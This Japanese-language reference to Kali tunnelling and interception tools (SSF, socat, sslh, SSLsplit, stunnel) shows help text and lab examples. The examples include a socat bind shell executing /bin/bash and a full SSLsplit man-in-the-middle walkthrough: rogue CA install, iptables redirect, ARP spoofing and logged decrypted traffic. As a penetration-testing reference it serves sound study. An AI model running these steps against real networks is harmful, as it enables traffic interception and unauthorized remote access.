11:58:25.618931 IP 192.168.11.3.47568 > 192.168.11.4.22: Flags [.], ack 45, win 501, options [nop,nop,TS val 1103327553 ecr 800996805], length 0
11:58:30.039125 IP 192.168.11.3.47568 > 192.168.11.4.22: Flags [P.], seq 92:136, ack 45, win 501, options [nop,nop,TS val 1103331973 ecr 800996805], length 44
11:58:30.088839 IP 192.168.11.4.22 > 192.168.11.3.47568: Flags [.], ack 136, win 501, options [nop,nop,TS val 801001322 ecr 1103331973], length 0
Secure Socket Funneling
TLSトンネルを経由してリモートホストにデータを転送します。
■ 使用方法
# クライアント
root@kali:~# ssf --help
Usage:
ssf [OPTION...] server_address
-h, --help Show help message
-v, --verbosity arg Verbosity:
critical|error|warning|info|debug|trace (default: info)
-q, --quiet Do not print logs
-c, --config arg Specify configuration file. If not set,
'config.json' is loaded from the current working
directory
-p, --port arg Remote port (default: 8011)
-m, --max-connect-attempts arg
Max unsuccessful connection attempts before
stopping (default: 1)
-t, --reconnect-delay arg Time to wait before attempting to reconnect
(default: 60)
-n, --no-reconnect Do not attempt to reconnect after loosing a
connection
-g, --gateway-ports Enable gateway ports
-S, --status Display microservices status
Services options:
-Y, --remote-shell [bind_address:]port
Enable remote shell service
-F, --remote-socks [bind_address:]port
Enable remote SOCKS service
-R, --remote-tcp-forward [bind_address:]port:remote_host:remote_port
Enable remote TCP port forwarding service
-V, --remote-udp-forward [bind_address:]port:remote_host:remote_port
Enable remote UDP port forwarding service
-X, --shell [bind_address:]port
Enable client shell service
-D, --socks [bind_address:]port
Enable client SOCKS service
-L, --tcp-forward [bind_address:]port:remote_host:remote_port
Enable client TCP port forwarding service
-U, --udp-forward [bind_address:]port:remote_host:remote_port
Enable client UDP port forwarding service
# サーバー
root@kali:~# ssfd --help
Usage:
ssfd [OPTION...]
-h, --help Show help message
-v, --verbosity arg Verbosity: critical|error|warning|info|debug|trace
(default: info)
-q, --quiet Do not print logs
-c, --config arg Specify configuration file. If not set,
'config.json' is loaded from the current working directory
-p, --port arg Local port (default: 8011)
-R, --relay-only The server will only relay connections
-l, --bind-address arg Server bind address
-g, --gateway-ports Enable gateway ports
-S, --status Display microservices status
# ファイルコピーコマンド
root@kali:~# ssfcp --help
Usage:
ssfcp [OPTION...] [host@]source_path [[host@]destination_path]
-h, --help Show help message
-v, --verbosity arg Verbosity: critical|error|warning|info|debug|trace
(default: info)
-q, --quiet Do not print logs
-c, --config arg Specify configuration file. If not set, 'config.json'
is loaded from the current working directory
-p, --port arg Remote port (default: 8011)
Copy options:
-t, --stdin-input Use stdin as input
--resume Attempt to resume operation if the destination
file exists
--check-integrity Check file integrity
-r, --recursive Copy files recursively
--max-transfers arg Max transfers in parallel (default: 1)
■ 使用例
# ホスト1でサーバーを起動
root@kali_1:~# ssfd -l 0.0.0.0
[...]
[2024-11-11T09:25:07+00:00] [info] [ssfd] listening on <0.0.0.0:8011>
[2024-11-11T09:25:07+00:00] [info] [ssfd] running (Ctrl + C to stop)
# ホスト2でクライアントを起動
root@kali_2:~# ssf -L 4444:192.168.11.3:4444 192.168.11.3
[...]
[2024-11-11T09:26:08+00:00] [info] [microservice] [stream_listener]: forward TCP connections from <127.0.0.1:4444> to 4444
[2024-11-11T09:26:08+00:00] [info] [client] service <tcp-forward> OK
# ホスト1(サーバー)で4444番ポートをリッスン
root@kali_1:~# ncat -l 4444
# ホスト2(クライアント)でローカルホストの4444番ポートに接続しデータ送信
root@kali_2:~# ncat 127.0.0.1 4444
hello
# ホスト1(サーバー)の4444番ポートにデータが転送される
root@kali_1:~# ncat -l 4444
hello
# ホスト1の4444番ポートに直接送信した場合はデータが平文のまま
root@kali_2:~# tcpdump -n -A -i eth0
11:19:04.260249 IP 192.168.11.4.44338 > 192.168.11.3.4444: Flags [P.], seq 380617744:380617750, ack 3075111035, win 502, options [nop,nop,TS val 1768084645 ecr 3584036271], length 6
E..:}#@.@.eq.........2.\.....Jx{....XV.....
ib......hello
# ホスト2の4444番ポートに送信した場合はクライアントがホスト1の8011番ポート(サーバーのデフォルトポート)にデータを暗号化して送信
root@kali_2:~# tcpdump -n -A -i eth0
09:34:18.150869 IP 192.168.11.4.52568 > 192.168.11.3.8011: Flags [P.], seq 1367954941:1367955011, ack 1682389761, win 501, options [nop,nop,TS val 1761797961 ecr 3577749154], length 70
E..z..@.@.?.........X.KQ.U.dG;.....X......
i..I.@......A..........Z%.K.....lM.8.......+..!.......$.ks.fz..=_.[.t.
..C...
# データを受信したサーバーは4444番ポートにデータを復号して送信
root@kali_1:~# tcpdump -n -A -i lo
11:27:23.253593 IP 192.168.11.3.35088 > 192.168.11.3.4444: Flags [P.], seq 3523786492:3523786498, ack 361940377, win 512, options [nop,nop,TS val 2256635252 ecr 2256602763], length 6
E..:P=@.@..V...........\............XW.....
...t....hello
# クライアントからサーバーへのファイル転送
root@kali_2:~# ssfcp /root/hello.txt 192.168.11.3@/root
[...]
[2024-11-11T11:33:08+00:00] [info] [ssfcp] data copied from /root/hello.txt to /root/hello.txt (success)
[2024-11-11T11:33:08+00:00] [info] [ssfcp] copy finished success (1/1 files copied)
Socat
ホスト間でバイトストリームを確立しデータを転送します。
■ 使用方法
root@kali:~# socat -h
Usage:
socat [options] <bi-address> <bi-address>
options (general command line options):
-V print version and feature information to stdout, and exit
-h|-? print a help text describing command line options and addresses
-hh like -h, plus a list of all common address option names
-hhh like -hh, plus a list of all available address option names
-d[ddd] increase verbosity (use up to 4 times; 2 are recommended)
-d0|1|2|3|4 set verbosity level (0: Errors; 4 all including Debug)
-D analyze file descriptors before loop
--experimental enable experimental features
--statistics output transfer statistics on exit
-ly[facility] log to syslog, using facility (default is daemon)
-lf<logfile> log to file
-ls log to stderr (default if no other log)
-lm[facility] mixed log mode (stderr during initialization, then syslog)
-lp<progname> set the program name used for logging and vars
-lu use microseconds for logging timestamps
-lh add hostname to log messages
-v verbose text dump of data traffic
-x verbose hexadecimal dump of data traffic
-r <file> raw dump of data flowing from left to right
-R <file> raw dump of data flowing from right to left
-b<size_t> set data buffer size (8192)
-s sloppy (continue on error)
-S<sigmask> log these signals, override default
-t<timeout> wait seconds before closing second channel
-T<timeout> total inactivity timeout in seconds
-u unidirectional mode (left to right)
-U unidirectional mode (right to left)
-g do not check option groups
-L <lockfile> try to obtain lock, or fail
-W <lockfile> try to obtain lock, or wait
-0 do not prefer an IP version
-4 prefer IPv4 if version is not explicitly specified
-6 prefer IPv6 if version is not explicitly specified
bi-address: /* is an address that may act both as data sync and source */
<single-address>
<single-address>!!<single-address>
single-address:
<address-head>[,<opts>]
address-head:
ABSTRACT-CLIENT:<filename> groups=FD,SOCKET,RETRY,UNIX
ABSTRACT-CONNECT:<filename> groups=FD,SOCKET,RETRY,UNIX
ABSTRACT-LISTEN:<filename> groups=FD,SOCKET,LISTEN,CHILD,RETRY,UNIX
ABSTRACT-RECV:<filename> groups=FD,SOCKET,RETRY,UNIX
ABSTRACT-RECVFROM:<filename> groups=FD,SOCKET,CHILD,RETRY,UNIX
ABSTRACT-SENDTO:<filename> groups=FD,SOCKET,RETRY,UNIX
ACCEPT-FD:<fdnum> groups=FD,SOCKET,CHILD,RETRY,RANGE,UNIX,IP4,IP6,UDP,TCP
CREATE:<filename> groups=FD,REG,NAMED
DCCP-CONNECT:<host>:<port> groups=FD,SOCKET,CHILD,RETRY,IP4,IP6
DCCP-LISTEN:<port> groups=FD,SOCKET,LISTEN,CHILD,RETRY,RANGE,IP4,IP6
DCCP4-CONNECT:<host>:<port> groups=FD,SOCKET,CHILD,RETRY,IP4
DCCP4-LISTEN:<port> groups=FD,SOCKET,LISTEN,CHILD,RETRY,RANGE,IP4
DCCP6-CONNECT:<host>:<port> groups=FD,SOCKET,CHILD,RETRY,IP6
DCCP6-LISTEN:<port> groups=FD,SOCKET,LISTEN,CHILD,RETRY,RANGE,IP6
EXEC:<command-line> groups=FD,FIFO,SOCKET,EXEC,FORK,TERMIOS,PTY,PARENT,UNIX
FD:<fdnum> groups=FD,FIFO,CHR,BLK,REG,SOCKET,TERMIOS,UNIX,IP4,IP6,UDP,TCP
GOPEN:<filename> groups=FD,FIFO,CHR,BLK,REG,SOCKET,NAMED,OPEN,TERMIOS,UNIX
INTERFACE:<interface> groups=FD,SOCKET,INTERFACE
IP-DATAGRAM:<host>:<protocol> groups=FD,SOCKET,RANGE,IP4,IP6
IP-RECV:<protocol> groups=FD,SOCKET,RANGE,IP4,IP6
IP-RECVFROM:<protocol> groups=FD,SOCKET,CHILD,RANGE,IP4,IP6
IP-SENDTO:<host>:<protocol> groups=FD,SOCKET,IP4,IP6
IP4-DATAGRAM:<host>:<protocol> groups=FD,SOCKET,RANGE,IP4
IP4-RECV:<protocol> groups=FD,SOCKET,RANGE,IP4
IP4-RECVFROM:<protocol> groups=FD,SOCKET,CHILD,RANGE,IP4
IP4-SENDTO:<host>:<protocol> groups=FD,SOCKET,IP4
IP6-DATAGRAM:<host>:<protocol> groups=FD,SOCKET,RANGE,IP6
IP6-RECV:<protocol> groups=FD,SOCKET,RANGE,IP6
IP6-RECVFROM:<protocol> groups=FD,SOCKET,CHILD,RANGE,IP6
IP6-SENDTO:<host>:<protocol> groups=FD,SOCKET,IP6
OPEN:<filename> groups=FD,FIFO,CHR,BLK,REG,NAMED,OPEN,TERMIOS
OPENSSL:<host>:<port> groups=FD,SOCKET,CHILD,RETRY,IP4,IP6,TCP,OPENSSL
OPENSSL-DTLS-CLIENT:<host>:<port> groups=FD,SOCKET,CHILD,RETRY,IP4,IP6,UDP,OPENSSL
OPENSSL-DTLS-SERVER:<port> groups=FD,SOCKET,LISTEN,CHILD,RETRY,RANGE,IP4,IP6,UDP,OPENSSL
OPENSSL-LISTEN:<port> groups=FD,SOCKET,LISTEN,CHILD,RETRY,RANGE,IP4,IP6,TCP,OPENSSL
PIPE[:<filename>] groups=FD,FIFO,NAMED,OPEN
POSIXMQ-BIDIRECTIONAL:<mqname> groups=FD,NAMED,RETRY
POSIXMQ-READ:<mqname> groups=FD,NAMED,RETRY
POSIXMQ-RECEIVE:<mqname> groups=FD,NAMED,CHILD,RETRY
POSIXMQ-SEND:<mqname> groups=FD,NAMED,CHILD,RETRY
PROXY:<proxy-server>:<host>:<port> groups=FD,SOCKET,CHILD,RETRY,IP4,IP6,TCP,HTTP
PTY groups=FD,NAMED,TERMIOS,PTY
SCTP-CONNECT:<host>:<port> groups=FD,SOCKET,CHILD,RETRY,IP4,IP6
SCTP-LISTEN:<port> groups=FD,SOCKET,LISTEN,CHILD,RETRY,RANGE,IP4,IP6
SCTP4-CONNECT:<host>:<port> groups=FD,SOCKET,CHILD,RETRY,IP4
SCTP4-LISTEN:<port> groups=FD,SOCKET,LISTEN,CHILD,RETRY,RANGE,IP4
SCTP6-CONNECT:<host>:<port> groups=FD,SOCKET,CHILD,RETRY,IP6
SCTP6-LISTEN:<port> groups=FD,SOCKET,LISTEN,CHILD,RETRY,RANGE,IP6
SHELL:<shell-command> groups=FD,FIFO,SOCKET,EXEC,FORK,SHELL,TERMIOS,PTY,PARENT,UNIX
SOCKET-CONNECT:<domain>:<protocol>:<remote-address> groups=FD,SOCKET,CHILD,RETRY
SOCKET-DATAGRAM:<domain>:<type>:<protocol>:<remote-address> groups=FD,SOCKET,RANGE
SOCKET-LISTEN:<domain>:<protocol>:<local-address> groups=FD,SOCKET,LISTEN,CHILD,RETRY,RANGE
SOCKET-RECV:<domain>:<type>:<protocol>:<local-address> groups=FD,SOCKET,RANGE
SOCKET-RECVFROM:<domain>:<type>:<protocol>:<local-address> groups=FD,SOCKET,CHILD,RANGE
SOCKET-SENDTO:<domain>:<type>:<protocol>:<remote-address> groups=FD,SOCKET
SOCKETPAIR:<filename> groups=FD,SOCKET
SOCKS4:<socks-server>:<host>:<port> groups=FD,SOCKET,CHILD,RETRY,IP4,IP6,TCP,SOCKS
SOCKS4A:<socks-server>:<host>:<port> groups=FD,SOCKET,CHILD,RETRY,IP4,IP6,TCP,SOCKS
SOCKS5-CONNECT:<socks-server>[:<socks-port>]:<target-host>:<target-port> groups=FD,SOCKET,CHILD,RETRY,IP4,IP6,TCP,SOCKS
SOCKS5-LISTEN:<socks-server>[:<socks-port>]:<listen-host>:<listen-port> groups=FD,SOCKET,CHILD,RETRY,IP4,IP6,TCP
STDERR groups=FD,FIFO,CHR,BLK,REG,SOCKET,TERMIOS,UNIX,IP4,IP6,UDP,TCP
STDIN groups=FD,FIFO,CHR,BLK,REG,SOCKET,TERMIOS,UNIX,IP4,IP6,UDP,TCP
STDIO groups=FD,FIFO,CHR,BLK,REG,SOCKET,TERMIOS,UNIX,IP4,IP6,UDP,TCP
STDOUT groups=FD,FIFO,CHR,BLK,REG,SOCKET,TERMIOS,UNIX,IP4,IP6,UDP,TCP
SYSTEM:<shell-command> groups=FD,FIFO,SOCKET,EXEC,FORK,TERMIOS,PTY,PARENT,UNIX
TCP-CONNECT:<host>:<port> groups=FD,SOCKET,CHILD,RETRY,IP4,IP6,TCP
TCP-LISTEN:<port> groups=FD,SOCKET,LISTEN,CHILD,RETRY,RANGE,IP4,IP6,TCP
TCP4-CONNECT:<host>:<port> groups=FD,SOCKET,CHILD,RETRY,IP4,TCP
TCP4-LISTEN:<port> groups=FD,SOCKET,LISTEN,CHILD,RETRY,RANGE,IP4,TCP
TCP6-CONNECT:<host>:<port> groups=FD,SOCKET,CHILD,RETRY,IP6,TCP
TCP6-LISTEN:<port> groups=FD,SOCKET,LISTEN,CHILD,RETRY,RANGE,IP6,TCP
TUN[:<ip-addr>/<bits>] groups=FD,CHR,OPEN,INTERFACE
UDP-CONNECT:<host>:<port> groups=FD,SOCKET,IP4,IP6,UDP
UDP-DATAGRAM:<host>:<port> groups=FD,SOCKET,RANGE,IP4,IP6,UDP
UDP-LISTEN:<port> groups=FD,SOCKET,LISTEN,CHILD,RANGE,IP4,IP6,UDP
UDP-RECV:<port> groups=FD,SOCKET,RANGE,IP4,IP6,UDP
UDP-RECVFROM:<port> groups=FD,SOCKET,CHILD,RANGE,IP4,IP6,UDP
UDP-SENDTO:<host>:<port> groups=FD,SOCKET,IP4,IP6,UDP
UDP4-CONNECT:<host>:<port> groups=FD,SOCKET,IP4,UDP
UDP4-DATAGRAM:<host>:<port> groups=FD,SOCKET,RANGE,IP4,UDP
UDP4-LISTEN:<port> groups=FD,SOCKET,LISTEN,CHILD,RANGE,IP4,UDP
UDP4-RECV:<port> groups=FD,SOCKET,RANGE,IP4,UDP
UDP4-RECVFROM:<port> groups=FD,SOCKET,CHILD,RANGE,IP4,UDP
UDP4-SENDTO:<host>:<port> groups=FD,SOCKET,IP4,UDP
UDP6-CONNECT:<host>:<port> groups=FD,SOCKET,IP6,UDP
UDP6-DATAGRAM:<host>:<port> groups=FD,SOCKET,RANGE,IP6,UDP
UDP6-LISTEN:<port> groups=FD,SOCKET,LISTEN,CHILD,RANGE,IP6,UDP
UDP6-RECV:<port> groups=FD,SOCKET,RANGE,IP6,UDP
UDP6-RECVFROM:<port> groups=FD,SOCKET,CHILD,RANGE,IP6,UDP
UDP6-SENDTO:<host>:<port> groups=FD,SOCKET,IP6,UDP
UDPLITE-CONNECT:<host>:<port> groups=FD,SOCKET,IP4,IP6,UDP
UDPLITE-DATAGRAM:<host>:<port> groups=FD,SOCKET,RANGE,IP4,IP6,UDP
UDPLITE-LISTEN:<port> groups=FD,SOCKET,LISTEN,CHILD,RANGE,IP4,IP6,UDP
UDPLITE-RECV:<port> groups=FD,SOCKET,RANGE,IP4,IP6,UDP
UDPLITE-RECVFROM:<port> groups=FD,SOCKET,CHILD,RANGE,IP4,IP6,UDP
UDPLITE-SENDTO:<host>:<port> groups=FD,SOCKET,IP4,IP6,UDP
UDPLITE4-CONNECT:<host>:<port> groups=FD,SOCKET,IP4,UDP
UDPLITE4-DATAGRAM:<remote-address>:<port> groups=FD,SOCKET,RANGE,IP4,UDP
UDPLITE4-LISTEN:<port> groups=FD,SOCKET,LISTEN,CHILD,RANGE,IP4,UDP
UDPLITE4-RECV:<port> groups=FD,SOCKET,RANGE,IP4,UDP
UDPLITE4-RECVFROM:<host>:<port> groups=FD,SOCKET,CHILD,RANGE,IP4,UDP
UDPLITE4-SENDTO:<host>:<port> groups=FD,SOCKET,IP4,UDP
UDPLITE6-CONNECT:<host>:<port> groups=FD,SOCKET,IP6,UDP
UDPLITE6-DATAGRAM:<host>:<port> groups=FD,SOCKET,RANGE,IP6,UDP
UDPLITE6-LISTEN:<port> groups=FD,SOCKET,LISTEN,CHILD,RANGE,IP6,UDP
UDPLITE6-RECV:<port> groups=FD,SOCKET,RANGE,IP6,UDP
UDPLITE6-RECVFROM:<port> groups=FD,SOCKET,CHILD,RANGE,IP6,UDP
UDPLITE6-SENDTO:<host>:<port> groups=FD,SOCKET,IP6,UDP
UNIX-CLIENT:<filename> groups=FD,SOCKET,NAMED,RETRY,UNIX
UNIX-CONNECT:<filename> groups=FD,SOCKET,NAMED,RETRY,UNIX
UNIX-LISTEN:<filename> groups=FD,SOCKET,NAMED,LISTEN,CHILD,RETRY,UNIX
UNIX-RECV:<filename> groups=FD,SOCKET,NAMED,RETRY,UNIX
UNIX-RECVFROM:<filename> groups=FD,SOCKET,NAMED,CHILD,RETRY,UNIX
UNIX-SENDTO:<filename> groups=FD,SOCKET,NAMED,RETRY,UNIX
VSOCK-CONNECT:<cid>:<port> groups=FD,SOCKET,CHILD,RETRY
VSOCK-LISTEN:<port> groups=FD,SOCKET,LISTEN,CHILD,RETRY
■ 使用例
# ホスト1で80番ポートのTCP接続をリッスンし、example.comに転送
root@kali_1:~# socat TCP4-LISTEN:80,fork TCP4-CONNECT:example.com:80
# ホスト2にHTTPリクエストを送信するとexample.comに転送され、example.comからのレスポンスが戻ってくる
root@kali_2:~# curl -H 'Host:example.com' http://192.168.11.3
<!doctype html>
<html>
<head>
<title>Example Domain</title>
[...]
<body>
<div>
<h1>Example Domain</h1>
<p>This domain is for use in illustrative examples in documents. You may use this
domain in literature without prior coordination or asking for permission.</p>
<p><a href="https://www.iana.org/domains/example">More information...</a></p>
</div>
</body>
</html>
# ホスト1で22番ポートのTCP接続をリッスンし、ホスト3に転送
root@kali_1:~# socat TCP4-LISTEN:22,fork TCP4-CONNECT:192.168.56.2:22
# ホスト2からホスト1にSSH接続(転送されてホスト3に接続)
root@kali_2:~# ssh -l hello 192.168.11.3
hello@192.168.11.3\'s password:
┌──(hello㉿kali_3)-[~]
└─$
# ホスト1で80番ポートのTCP接続をリッスンし、受信したコマンドを実行
root@kali_1:~# socat TCP4-LISTEN:4444,fork EXEC:"/bin/bash"
# ホスト2からホスト1に接続してコマンドを実行
root@kali_2:~# ncat 192.168.11.3 4444
hostname
kali_1
sslh
特定のポートで受け入れたパケットを、プロトコル(HTTP、TLS/SSL、SSH、OpenVPN、tinc、XMPP、SOCKS5など)に応じて対応するアドレスに転送します。
■ 使用方法
root@kali:~# sslh --help
[-Vfin] [-F <file>] [-v <n>] [--transparent] [-t <n>] [-u <str>] [-P <file>] [-C <path>] [--syslog-facility=<str>] [--on-timeout=<str>] [--prefix=<str>] [-p <host:port>]... [--ssh=<host:port>]... [--tls=<host:port>]... [--openvpn=<host:port>]... [--tinc=<host:port>]... [--xmpp=<host:port>]... [--http=<host:port>]... [--adb=<host:port>]... [--socks5=<host:port>]... [--syslog=<host:port>]... [--anyprot=<host:port>]...
-F, --config=<file> Specify configuration file
-v, --verbose=<n>
-V, --version Print version information and exit
-f, --foreground Run in foreground instead of as a daemon
-i, --inetd Run in inetd mode: use stdin/stdout instead of network listen
-n, --numeric Print IP addresses and ports as numbers
--transparent Set up as a transparent proxy
-t, --timeout=<n> Set up timeout before connecting to default target
-u, --user=<str> Username to change to after set-up
-P, --pidfile=<file> Path to file to store PID of current instance
-C, --chroot=<path> Root to change to after set-up
--syslog-facility=<str> Facility to syslog to
--on-timeout=<str> Target to connect to when timing out
--prefix=<str> Reserved for testing
-p, --listen=<host:port> Listen on host:port
--ssh=<host:port> Set up ssh target
--tls=<host:port> Set up TLS/SSL target
--openvpn=<host:port> Set up OpenVPN target
--tinc=<host:port> Set up tinc target
--xmpp=<host:port> Set up XMPP target
--http=<host:port> Set up HTTP (plain) target
--adb=<host:port> Set up ADB (Android Debug) target
--socks5=<host:port> Set up socks5 target
--syslog=<host:port> Set up syslog target
--anyprot=<host:port> Set up default target
■ 使用例
# 443番ポートにSSH接続があった場合は22番ポートに転送する
root@kali_1:~# sslh -p 0.0.0.0:443 --ssh 127.0.0.1:22
# 443番ポートを使ってSSH接続しログイン
root@kali_2:~# ssh hello@192.168.11.4 -p 443
hello@192.168.11.4\'s password:
┌──(hello㉿kali_1)-[~]
└─$
SSLsplit
SSL/TLS暗号化ネットワーク接続に対する中間者攻撃のためのツールです。
■ 使用方法
root@kali:~# sslsplit -h
Usage: sslsplit [-D] [-f conffile] [-o opt=val] [options...] [proxyspecs...]
-f conffile use conffile to load configuration from
-o opt=val override conffile option opt with value val
-c pemfile use CA cert (and key) from pemfile to sign forged certs
-k pemfile use CA key (and cert) from pemfile to sign forged certs
-C pemfile use CA chain from pemfile (intermediate and root CA certs)
-K pemfile use key from pemfile for leaf certs (default: generate)
-q crlurl use URL as CRL distribution point for all forged certs
-t certdir use cert+chain+key PEM files from certdir to target all sites
matching the common names (non-matching: -T or generate if CA)
-A pemfile use cert+chain+key PEM file as fallback leaf cert when none of
those given by -t match, instead of generating one on the fly
-w gendir write leaf key and only generated certificates to gendir
-W gendir write leaf key and all certificates to gendir
-O deny all OCSP requests on all proxyspecs
-P passthrough SSL connections if they cannot be split because of
client cert auth or no matching cert and no CA (default: drop)
-a pemfile use cert from pemfile when destination requests client certs
-b pemfile use key from pemfile when destination requests client certs
-g pemfile use DH group params from pemfile (default: keyfiles or auto)
-G curve use ECDH named curve (default: prime256v1)
-Z disable SSL/TLS compression on all connections
-r proto only support one of tls10 tls11 tls12 (default: all)
-R proto disable one of tls10 tls11 tls12 (default: none)
-s ciphers use the given OpenSSL cipher suite spec (default: ALL:-aNULL)
-x engine load OpenSSL engine with the given identifier
-e engine specify default NAT engine to use (default: netfilter)
-E list available NAT engines and exit
-u user drop privileges to user (default if run as root: nobody)
-m group when using -u, override group (default: primary group of user)
-j jaildir chroot() to jaildir (impacts sni proxyspecs, see manual page)
-p pidfile write pid to pidfile (default: no pid file)
-l logfile connect log: log one line summary per connection to logfile
-L logfile content log: full data to file or named pipe (excludes -S/-F)
-S logdir content log: full data to separate files in dir (excludes -L/-F)
-F pathspec content log: full data to sep files with % subst (excl. -L/-S):
%T - initial connection time as an ISO 8601 UTC timestamp
%d - destination host and port
%D - destination host
%p - destination port
%s - source host and port
%S - source host
%q - source port
%% - literal '%'
e.g. "/var/log/sslsplit/%T-%s-%d.log"
-X pcapfile pcap log: packets to pcapfile (excludes -Y/-y)
-Y pcapdir pcap log: packets to separate files in dir (excludes -X/-y)
-y pathspec pcap log: packets to sep files with % subst (excl. -X/-Y):
see option -F for pathspec format
-I if mirror packets to interface
-T addr mirror packets to target address (used with -I)
-M logfile log master keys to logfile in SSLKEYLOGFILE format
-d daemon mode: run in background, log error messages to syslog
-D debug mode: run in foreground, log debug messages on stderr
-V print version information and exit
-h print usage information and exit
■ 使用例
# 自己署名のCA証明書を作成
root@kali_1:~# openssl genrsa -out hello.key 4096
root@kali_1:~# openssl req -new -x509 -key hello.key -out hello.crt
# 標的ホストにCA証明書をインストール
root@kali_2:~# mv hello.crt /usr/share/ca-certificates/
root@kali_2:~# echo "hello.crt" >> /etc/ca-certificates.conf
root@kali_2:~# update-ca-certificates
# 攻撃者ホストで443番ポートへのトラフィックを8443番ポートに転送
root@kali_1:~# iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 8443
# 標的ホストに対してARPスプーフィングを実行
root@kali_1:~# arpspoof -i eth0 -c both -t 192.168.11.4 192.168.11.1
root@kali_1:~# mkdir -p sslsplit/logs
# 8443番ポートでリッスンする
root@kali_1:~# sslsplit -S ./sslsplit/logs/ -k hello.key -c hello.crt -P https 0.0.0.0 8443
# 標的ホストで外部サイトにPOSTリクエストを送信
root@kali_2:~# curl -X POST https://fakestoreapi.com/products -d "{ title: 'test product', price: 13.5 }"
# 攻撃者ホストにログが出力される
root@kali_1:~# sslsplit -S ./sslsplit/logs/ -k hello.key -c hello.crt -P https 0.0.0.0 8443
https 192.168.11.4 35372 172.67.194.129 443 fakestoreapi.com POST /products 200 9 sni:fakestoreapi.com names:fakestoreapi.com/fakestoreapi.com/*.fakestoreapi.com sproto:TLSv1.3:TLS_AES_256_GCM_SHA384 dproto:TLSv1.3:TLS_AES_256_GCM_SHA384 origcrt:98D7CCC5E33363DA75FA4EC74081917AA8E66749 usedcrt:34B9AABC552C2B5CCAE613D6E33491F929CFBA17
# ログに送信したPOSTデータやレスポンスが記録される
root@kali_1:~# cat sslsplit/logs/20241118T062538Z-192.168.11.4,35372-172.67.194.129,443.log
POST /products HTTP/1.1
Host: fakestoreapi.com
User-Agent: curl/8.9.1
Accept: */*
Content-Length: 38
Content-Type: application/x-www-form-urlencoded
{ title: 'test product', price: 13.5 }HTTP/1.1 200 OK
Date: Mon, 18 Nov 2024 06:25:41 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 9
Connection: close
access-control-allow-origin: *
etag: W/"9-YMkvF/wJa2P/mVmfWcyTuUjssI8"
x-powered-by: Express
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0NJbGIIWpejWrU9rOodsrytxNNQpBCPhxQq9hXSMYYK2IOzB%2FZSPtxSmPNVyiCCwXOVorhgPNIYogSfUalhovk2ndQk396cXAcLbE6K0J9ubCNWxbJaj3NTfCwShGrje77wu"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e45e2788c2f2b84-LAX
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=128879&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=855&delivery_rate=22251&cwnd=32&unsent_bytes=0&cid=f2e40991cbf79b1d&ts=686&x=0"
{"id":21}
Stunnel
既存のクライアントやサーバーにTLS暗号化機能を追加するために設計されたプロキシです。
■ 使用方法
root@kali:~# stunnel -help
Global options:
chroot = directory to chroot stunnel process
compression = compression type
EGD = path to Entropy Gathering Daemon socket
engine = auto|engine_id
engineCtrl = cmd[:arg]
engineDefault = TASK_LIST
foreground = yes|quiet|no foreground mode (don\'t fork, log to stderr)
log = append|overwrite log file
output = file to append log messages
pid = pid file
RNDbytes = bytes to read from random seed files
RNDfile = path to file with random seed data
RNDoverwrite = yes|no overwrite seed datafiles with new random data
syslog = yes|no send logging messages to syslog
Service-level options:
accept = [host:]port accept connections on specified host:port
CAengine = engine-specific CA certificate identifier for 'verify' option
CApath = CA certificate directory for 'verify' option
CAfile = CA certificate file for 'verify' option
cert = certificate chain
checkEmail = peer certificate email address
checkHost = peer certificate host name pattern
checkIP = peer certificate IP address
ciphers = permitted ciphers for TLS 1.2 or older
ciphersuites = permitted ciphersuites for TLS 1.3
client = yes|no client mode (remote service uses TLS)
config = command[:parameter] to execute
connect = [host:]port to connect
CRLpath = CRL directory
CRLfile = CRL file
curves = ECDH curve names
debug = [facility].level (e.g. daemon.info)
delay = yes|no delay DNS lookup for 'connect' option
engineId = ID of engine to read the key from
engineNum = number of engine to read the key from
exec = file execute local inetd-type program
execArgs = arguments for 'exec' (including $0)
failover = rr|prio failover strategy
ident = username for IDENT (RFC 1413) checking
include = directory with configuration file snippets
key = certificate private key
libwrap = yes|no use /etc/hosts.allow and /etc/hosts.deny
local = IP address to be used as source for remote connections
logId = connection identifier type
OCSP = OCSP responder URL
OCSPaia = yes|no check the AIA responders from certificates
OCSPflag = OCSP responder flags
OCSPnonce = yes|no send and verify the OCSP nonce extension
OCSPrequire = yes|no require a conclusive OCSP response
options = TLS option to set/reset
protocol = protocol to negotiate before TLS initialization
currently supported: cifs, connect, imap,
nntp, pgsql, pop3, proxy, smtp, socks
protocolAuthentication = authentication type for protocol negotiations
protocolDomain = domain for protocol negotiations
protocolHeader = custom header for protocol negotiations
protocolHost = host:port for protocol negotiations
protocolPassword = password for protocol negotiations
protocolUsername = username for protocol negotiations
PSKidentity = identity for PSK authentication
PSKsecrets = secrets for PSK authentication
pty = yes|no allocate pseudo terminal for 'exec' option
redirect = [host:]port to redirect on authentication failures
renegotiation = yes|no support renegotiation
requireCert = yes|no require client certificate
reset = yes|no send TCP RST on error
retry = yes|no retry connect+exec section
securityLevel = set the security level
service = service name
setgid = groupname for setgid()
setuid = username for setuid()
sessionCacheSize = session cache size
sessionCacheTimeout = session cache timeout (in seconds)
sessionResume = yes|no enable session resumption
sessiond = [host:]port use sessiond at host:port
sni = primary_service:host_name for an SNI virtual service
socket = a|l|r:option=value[:value]
set an option on accept/local/remote socket
sslVersion = all|SSLv3|TLSv1|TLSv1.1|TLSv1.2|TLSv1.3 TLS version
sslVersionMax = all|SSLv3|TLSv1|TLSv1.1|TLSv1.2|TLSv1.3 TLS version
sslVersionMin = all|SSLv3|TLSv1|TLSv1.1|TLSv1.2|TLSv1.3 TLS version
stack = thread stack size (in bytes)
ticketKeySecret = secret key for encryption/decryption TLSv1.3 tickets
ticketMacSecret = key for HMAC operations on TLSv1.3 tickets
TIMEOUTbusy = seconds to wait for expected data
TIMEOUTclose = seconds to wait for close_notify
TIMEOUTconnect = seconds to connect remote host
TIMEOUTidle = seconds to keep an idle connection
TIMEOUTocsp = seconds to connect OCSP responder
transparent = none|source|destination|both transparent proxy mode
verify = level of peer certificate verification
verifyChain = yes|no verify certificate chain
